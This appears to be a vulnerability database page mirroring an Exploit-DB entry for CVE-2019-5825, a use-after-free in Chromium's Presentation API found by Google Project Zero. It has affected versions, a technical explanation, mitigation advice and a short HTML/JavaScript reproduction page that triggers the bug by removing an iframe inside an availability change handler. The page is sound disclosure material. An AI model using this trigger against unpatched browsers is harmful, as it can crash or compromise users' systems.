header-logo
Suggest Exploit
vendor:
Chromium
by:
Sergei Glazunov
6.5
CVSS
MEDIUM
Use-after-free
416
CWE
Product Name: Chromium
Affected Version From: Chromium 74.0.3729.0
Affected Version To: Chromium 76.0.3789.0
Patch Exists: YES
Related CWE: CVE-2019-5825
CPE: a:google:chromium
Metasploit: https://www.rapid7.com/db/vulnerabilities/google-chrome-cve-2019-5825/https://www.rapid7.com/db/vulnerabilities/debian-cve-2019-5825/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2019-5825/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2019-5825/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2019-5825/
Other Scripts: N/A
Platforms Tested: Windows, Linux, Mac
2019

Use-after-free in PresentationAvailabilityState::UpdateAvailability

The PresentationAvailabilityState::UpdateAvailability() function in Chromium contains a use-after-free vulnerability. This vulnerability occurs when the `AvailabilityChanged` function is called on an observer that has been removed from the `availability_observers` list. An attacker can exploit this vulnerability by creating a malicious webpage that calls the `PresentationRequest` API and then removes the iframe containing the request. This will cause the `AvailabilityChanged` function to be called on an observer that has been removed from the `availability_observers` list, resulting in a use-after-free vulnerability.

Mitigation:

Upgrade to the latest version of Chromium to patch this vulnerability.
Source

Exploit-DB raw data:

<!--
VULNERABILITY DETAILS
void PresentationAvailabilityState::UpdateAvailability(
    const KURL& url,
    mojom::blink::ScreenAvailability availability) {
[...]
  {
    // Set |iterating_listeners_| so we know not to allow modifications
    // to |availability_listeners_|.
    base::AutoReset<bool> iterating(&iterating_listeners_, true);
    for (auto& listener_ref : availability_listeners_) {
      auto* listener = listener_ref.get();
      if (!listener->urls.Contains<KURL>(url))
        continue;

      auto screen_availability = GetScreenAvailability(listener->urls);
      DCHECK(screen_availability != mojom::blink::ScreenAvailability::UNKNOWN);
      for (auto* observer : listener->availability_observers)
        observer->AvailabilityChanged(screen_availability); // ***1***
[...]

`PresentationAvailabilityObserver::AvailabilityChanged` might call a user-defined JS event handler,
which in turn might modify `availability_observers` and invalidate the `for` loop's iterator.

VERSION
Chromium 74.0.3729.0 (Developer Build) (64-bit)
Chromium 76.0.3789.0 (Developer Build) (64-bit)

REPRODUCTION CASE
Note that you need an extra display connected to your machine to reproduce the bug, otherwise
`UpdateAvailability` won't be called.
-->

<body>
<script>
frame = document.body.appendChild(document.createElement("iframe"));
request = new frame.contentWindow.PresentationRequest([location]);
request.getAvailability().then(availability => {
  availability.onchange = () => frame.remove();
});
</script>
</body>

<!--
CREDIT INFORMATION
Sergei Glazunov of Google Project Zero.
-->

Navigation

Suggest Exploit

Services By CQR